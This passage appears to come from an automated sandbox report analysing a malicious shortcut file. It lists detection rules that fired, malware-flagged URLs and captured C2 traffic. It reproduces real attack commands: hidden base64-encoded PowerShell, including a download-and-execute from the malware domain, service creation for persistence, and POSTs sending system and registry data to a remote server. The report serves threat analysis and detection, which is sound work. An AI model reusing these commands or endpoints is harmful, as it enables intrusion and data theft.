QBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcA

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe cakoi10, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 2236, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 8152, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1804, TargetFilename: C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 5480, ProcessName: net.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 2764, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" , CommandLine: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcA

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 8832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6700, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 8688, ProcessName: sc.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 5480, ProcessName: net.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline", ProcessId: 8376, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T12:30:13.873811+0100	2803305	3	Unknown Traffic	192.168.11.20	49761	104.21.1.51	443	TCP
2024-12-11T12:31:07.913778+0100	2803305	3	Unknown Traffic	192.168.11.20	49766	104.21.1.51	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T12:29:01.463885+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49738	104.21.1.51	443	TCP
2024-12-11T12:29:03.532490+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49740	104.21.1.51	443	TCP
2024-12-11T12:29:05.790170+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49742	104.21.1.51	443	TCP
2024-12-11T12:29:28.015703+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49755	104.21.1.51	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cocomethode.de	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/OKNf	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/StaticFile/RdpService/87ice	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df7	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/StaticFile/RdpService/87	Avira URL Cloud: Label: malware
Source: http://cocomethode.de	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/StaticFile/TermServiceTryRun/12	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/7fd1a89d0020dcffe37c334092d29597499af8b82a4f37fb75f7f3a0a1257f1e979bdbe	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd0	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83	Avira URL Cloud: Label: malware
Source: http://cocomethode.de:443/	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b9048f0e3e116858dfb6bb0	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7a	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5	Avira URL Cloud: Label: malware
Source: http://cocomethode.de/api/check	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b904	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: 0A3NB8ot11.lnk	Virustotal: Detection: 30%			Perma Link
Source: 0A3NB8ot11.lnk	ReversingLabs: Detection: 31%

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49761 version: TLS 1.2

Source:

Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.3643874588.000001B5FCF4D000.00000004.00000020.00020000.00000000.sdmp

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp

String found in memory: <   "><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49765

Source: global traffic

TCP traffic: 192.168.11.20:49763 -> 23.88.71.29:8000

Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/87 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/12 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: O2K7+xXYk0GzErsWSELewg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 36 33 30 31 33 33 37 32 46 36 35 37 35 41 39 44 34 45 41 32 39 43 42 36 30 38 37 39 38 45 44 39 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "63013372F6575A9D4EA29CB608798ED9\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Source: global traffic	HTTP traffic detected: POST /api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd19ad4ec7f3d5Content-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 61 64 34 65 63 37 66 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 